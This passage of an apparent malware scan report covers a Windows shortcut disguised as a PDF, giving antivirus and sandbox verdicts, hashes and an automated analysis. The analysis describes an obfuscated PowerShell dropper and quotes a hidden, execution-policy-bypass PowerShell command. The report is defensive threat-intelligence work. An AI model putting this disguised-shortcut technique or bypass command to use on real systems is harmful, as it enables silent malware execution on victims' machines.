                    "engine_version": "5.6.0.1032",
                    "engine_update": "20260414",
                    "category": "undetected",
                    "result": null
                },
                "MicroWorld-eScan": {
                    "method": "blacklist",
                    "engine_name": "MicroWorld-eScan",
                    "engine_version": "14.0.409.0",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
                },
                "Rising": {
                    "method": "blacklist",
                    "engine_name": "Rising",
                    "engine_version": "25.0.0.28",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Trojan.PSRunner/LNK!1.BADE (CLASSIC)"
                },
                "Sophos": {
                    "method": "blacklist",
                    "engine_name": "Sophos",
                    "engine_version": "3.4.1.0",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Mal/LnkObf-A"
                },
                "F-Secure": {
                    "method": "blacklist",
                    "engine_name": "F-Secure",
                    "engine_version": "18.10.1547.307",
                    "engine_update": "20260414",
                    "category": "undetected",
                    "result": null
                },
                "DrWeb": {
                    "method": "blacklist",
                    "engine_name": "DrWeb",
                    "engine_version": "7.0.75.2070",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "VIPRE": {
                    "method": "blacklist",
                    "engine_name": "VIPRE",
                    "engine_version": "6.0.0.35",
                    "engine_update": "20260414",
                    "category": "malicious",
                    "result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
                },
                "TrendMicro": {
                    "method": "blacklist",
                    "engine_name": "TrendMicro",
                    "engine_version": "24.550.0.1002",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "HEUR_LNKEXEC.A"
                },
                "McAfeeD": {
                    "method": "blacklist",
                    "engine_name": "McAfeeD",
                    "engine_version": "1.2.0.14392",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Trojan:Shortcut/SuspiciousLNK.SPCS!1"
                },
                "SentinelOne": {
                    "method": "blacklist",
                    "engine_name": "SentinelOne",
                    "engine_version": "7.6.2.19",
                    "engine_update": "20260324",
                    "category": "undetected",
                    "result": null
                },
                "CMC": {
                    "method": "blacklist",
                    "engine_name": "CMC",
                    "engine_version": "2.4.2022.1",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "Emsisoft": {
                    "method": "blacklist",
                    "engine_name": "Emsisoft",
                    "engine_version": "2024.8.0.61147",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B (B)"
                },
                "Ikarus": {
                    "method": "blacklist",
                    "engine_name": "Ikarus",
                    "engine_version": "6.4.16.0",
                    "engine_update": "20260414",
                    "category": "malicious",
                    "result": "Trojan-Downloader.PS.Agent"
                },
                "Jiangmin": {
                    "method": "blacklist",
                    "engine_name": "Jiangmin",
                    "engine_version": "16.0.100",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "Google": {
                    "method": "blacklist",
                    "engine_name": "Google",
                    "engine_version": "1776229265",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Detected"
                },
                "Avira": {
                    "method": "blacklist",
                    "engine_name": "Avira",
                    "engine_version": "8.3.3.24",
                    "engine_update": "20260414",
                    "category": "undetected",
                    "result": null
                },
                "Antiy-AVL": {
                    "method": "blacklist",
                    "engine_name": "Antiy-AVL",
                    "engine_version": "3.0",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "Kingsoft": {
                    "method": "blacklist",
                    "engine_name": "Kingsoft",
                    "engine_version": "None",
                    "engine_update": "20260414",
                    "category": "undetected",
                    "result": null
                },
                "Gridinsoft": {
                    "method": "blacklist",
                    "engine_name": "Gridinsoft",
                    "engine_version": "1.0.243.174",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "Xcitium": {
                    "method": "blacklist",
                    "engine_name": "Xcitium",
                    "engine_version": "38566",
                    "engine_update": "20260414",
                    "category": "undetected",
                    "result": null
                },
                "Microsoft": {
                    "method": "blacklist",
                    "engine_name": "Microsoft",
                    "engine_version": "1.1.26030.3008",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Trojan:Win32/WinLNK.HDA!MTB"
                },
                "ViRobot": {
                    "method": "blacklist",
                    "engine_name": "ViRobot",
                    "engine_version": "2014.3.20.0",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "ZoneAlarm": {
                    "method": "blacklist",
                    "engine_name": "ZoneAlarm",
                    "engine_version": "6.23-113519617",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Mal/LnkObf-A"
                },
                "GData": {
                    "method": "blacklist",
                    "engine_name": "GData",
                    "engine_version": "GD:27.44197AVA:64.31039",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "CMD:Heur.BZC.YAX.Pantera.229.092F4C5B"
                },
                "Varist": {
                    "method": "blacklist",
                    "engine_name": "Varist",
                    "engine_version": "6.6.1.3",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "AhnLab-V3": {
                    "method": "blacklist",
                    "engine_name": "AhnLab-V3",
                    "engine_version": "3.29.3.10609",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "Acronis": {
                    "method": "blacklist",
                    "engine_name": "Acronis",
                    "engine_version": "1.2.0.121",
                    "engine_update": "20240328",
                    "category": "undetected",
                    "result": null
                },
                "VBA32": {
                    "method": "blacklist",
                    "engine_name": "VBA32",
                    "engine_version": "5.5.1",
                    "engine_update": "20260414",
                    "category": "malicious",
                    "result": "Trojan.Link.Crafted"
                },
                "TACHYON": {
                    "method": "blacklist",
                    "engine_name": "TACHYON",
                    "engine_version": "2026-04-15.02",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "Zoner": {
                    "method": "blacklist",
                    "engine_name": "Zoner",
                    "engine_version": "2.2.2.0",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "Tencent": {
                    "method": "blacklist",
                    "engine_name": "Tencent",
                    "engine_version": "1.0.0.1",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "Win32.Trojan.Agent.Kajl"
                },
                "Yandex": {
                    "method": "blacklist",
                    "engine_name": "Yandex",
                    "engine_version": "5.5.2.24",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "TrellixENS": {
                    "method": "blacklist",
                    "engine_name": "TrellixENS",
                    "engine_version": "6.0.6.653",
                    "engine_update": "20260414",
                    "category": "malicious",
                    "result": "Trojan-JACI!5577FFFB5B5A"
                },
                "huorong": {
                    "method": "blacklist",
                    "engine_name": "huorong",
                    "engine_version": "c3d08f2:c3d08f2:dc6aaa5:dc6aaa5",
                    "engine_update": "20260415",
                    "category": "malicious",
                    "result": "HEUR:Trojan/LNK.Agent.b"
                },
                "MaxSecure": {
                    "method": "blacklist",
                    "engine_name": "MaxSecure",
                    "engine_version": "1.0.0.1",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "Fortinet": {
                    "method": "blacklist",
                    "engine_name": "Fortinet",
                    "engine_version": "7.0.30.0",
                    "engine_update": "20260415",
                    "category": "undetected",
                    "result": null
                },
                "Panda": {
                    "method": "blacklist",
                    "engine_name": "Panda",
                    "engine_version": "4.6.4.2",
                    "engine_update": "20260414",
                    "category": "undetected",
                    "result": null
                },
                "alibabacloud": {
                    "method": "blacklist",
                    "engine_name": "alibabacloud",
                    "engine_version": "2.2.0",
                    "engine_update": "20250321",
                    "category": "malicious",
                    "result": "Trojan:Win/BZC.YMF"
                },
                "Avast": {
                    "method": "blacklist",
                    "engine_name": "Avast",
                    "engine_version": "23.9.8494.0",
                    "engine_update": "20260322",
                    "category": "failure",
                    "result": null
                },
                "Zillya": {
                    "method": "blacklist",
                    "engine_name": "Zillya",
                    "engine_version": "2.0.0.5581",
                    "engine_update": "20260414",
                    "category": "failure",
                    "result": null
                },
                "AVG": {
                    "method": "blacklist",
                    "engine_name": "AVG",
                    "engine_version": "23.9.8494.0",
                    "engine_update": "20260322",
                    "category": "failure",
                    "result": null
                },
                "Avast-Mobile": {
                    "method": "blacklist",
                    "engine_name": "Avast-Mobile",
                    "engine_version": "260413-00",
                    "engine_update": "20260414",
                    "category": "type-unsupported",
                    "result": null
                },
                "SymantecMobileInsight": {
                    "method": "blacklist",
                    "engine_name": "SymantecMobileInsight",
                    "engine_version": "2.0",
                    "engine_update": "20260123",
                    "category": "type-unsupported",
                    "result": null
                },
                "BitDefenderFalx": {
                    "method": "blacklist",
                    "engine_name": "BitDefenderFalx",
                    "engine_version": "2.0.936",
                    "engine_update": "20251216",
                    "category": "type-unsupported",
                    "result": null
                },
                "DeepInstinct": {
                    "method": "blacklist",
                    "engine_name": "DeepInstinct",
                    "engine_version": "5.0.0.8",
                    "engine_update": "20260407",
                    "category": "type-unsupported",
                    "result": null
                },
                "Elastic": {
                    "method": "blacklist",
                    "engine_name": "Elastic",
                    "engine_version": "4.0.255",
                    "engine_update": "20260327",
                    "category": "type-unsupported",
                    "result": null
                },
                "Webroot": {
                    "method": "blacklist",
                    "engine_name": "Webroot",
                    "engine_version": "1.9.0.8",
                    "engine_update": "20250227",
                    "category": "type-unsupported",
                    "result": null
                },
                "APEX": {
                    "method": "blacklist",
                    "engine_name": "APEX",
                    "engine_version": "6.769",
                    "engine_update": "20260413",
                    "category": "type-unsupported",
                    "result": null
                },
                "Paloalto": {
                    "method": "blacklist",
                    "engine_name": "Paloalto",
                    "engine_version": "0.9.0.1003",
                    "engine_update": "20260415",
                    "category": "type-unsupported",
                    "result": null
                },
                "Alibaba": {
                    "method": "blacklist",
                    "engine_name": "Alibaba",
                    "engine_version": "0.3.0.5",
                    "engine_update": "20190527",
                    "category": "type-unsupported",
                    "result": null
                },
                "Trapmine": {
                    "method": "blacklist",
                    "engine_name": "Trapmine",
                    "engine_version": "4.0.11.0",
                    "engine_update": "20260331",
                    "category": "type-unsupported",
                    "result": null
                },
                "Cylance": {
                    "method": "blacklist",
                    "engine_name": "Cylance",
                    "engine_version": "3.0.0.0",
                    "engine_update": "20260410",
                    "category": "type-unsupported",
                    "result": null
                },
                "tehtris": {
                    "method": "blacklist",
                    "engine_name": "tehtris",
                    "engine_version": "v0.1.4",
                    "engine_update": "20260415",
                    "category": "type-unsupported",
                    "result": null
                },
                "Trustlook": {
                    "method": "blacklist",
                    "engine_name": "Trustlook",
                    "engine_version": "1.0",
                    "engine_update": "20260415",
                    "category": "type-unsupported",
                    "result": null
                }
            },
            "sandbox_verdicts": {
                "Zenbox": {
                    "category": "malicious",
                    "malware_classification": [
                        "MALWARE",
                        "EVADER"
                    ],
                    "sandbox_name": "Zenbox",
                    "confidence": 68
                },
                "Dr.Web vxCube": {
                    "category": "malicious",
                    "malware_classification": [
                        "MALWARE"
                    ],
                    "sandbox_name": "Dr.Web vxCube"
                }
            },
            "trid": [
                {
                    "file_type": "Windows Shortcut",
                    "probability": 100.0
                }
            ],
            "vhash": "3a3aa9c652cbe087bd436db96feb0618",
            "ssdeep": "1536:XmqztgcGChu/Ry9gsNJocZX1JbmfurzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzGzi:XmqztgcGChu/Ry9gsNJocZX1Jbmfu6",
            "total_votes": {
                "harmless": 0,
                "malicious": 0
            },
            "type_description": "Windows shortcut",
            "filecondis": {
                "dhash": "b3a0b49a9092a382",
                "raw_md5": "5eaa217aa4ca4c6b9c9061a8c3b9daae"
            },
            "names": [
                "\uc774\uc18c\uc5f0 \uc790\uae30\uc18c\uac1c\uc11c.pdf.lnk"
            ],
            "type_extension": "lnk",
            "type_tags": [
                "windows",
                "lnk"
            ],
            "tlsh": "T1EE251135AACD92401870ED79A2458E6FD86AF7E1A75F70531233CBCC5A0A56BC1A3F31",
            "meaningful_name": "\uc774\uc18c\uc5f0 \uc790\uae30\uc18c\uac1c\uc11c.pdf.lnk",
            "crowdsourced_ai_results": [
                {
                    "verdict": "malicious",
                    "category": "code_insight",
                    "source": "palm",
                    "analysis": "This LNK file exhibits a highly malicious execution chain characteristic of malware. Although the primary target appears to be a legitimate file (`%ProgramFiles%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe`), the critical factor is the enormous command-line argument containing obfuscated PowerShell code. This technique (LNK hijacking) is used to disguise the true execution. The script is designed to execute as follows:\n\n1. **LOLBin Abuse:** The script is ultimately executed by `powershell.exe` (a LOLBin).\n2. **Deobfuscation/Decryption:** The arguments contain a massive, whitespace-separated string of numbers (`$VIUSBvejbawf`) which represents encoded data. The PowerShell script then performs a complex calculation involving this data and a key (`be*&fni`) to reconstruct a final payload string (`$qqpvm`). This is a common malware technique for evading static detection.\n3. **Payload Dropping:** The deobfuscated payload (`$qqpvm`) is written to a new file named `firefox.ps1` inside the `%APPDATA%` directory.\n4. **Final Execution:** The script immediately executes this newly dropped PowerShell script using `powershell -windowstyle hidden -ExecutionPolicy Bypass $fgfw98JHGVfeg;` to ensure silent execution with relaxed security measures.\n\nKey malicious indicators include the abuse of LNK arguments to hold a multi-stage PowerShell payload, obfuscation via numerical encoding, targeting a user-writable location (`%APPDATA%`) for payload dropping, and the use of the `powershell -windowstyle hidden -ExecutionPolicy Bypass` command.",
                    "id": "863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1-file-palm"
                }
            ]
        }
    }
}
            

⚠ These IoCs were automatically extracted using regular expressions or an LLM and may include non-malicious data.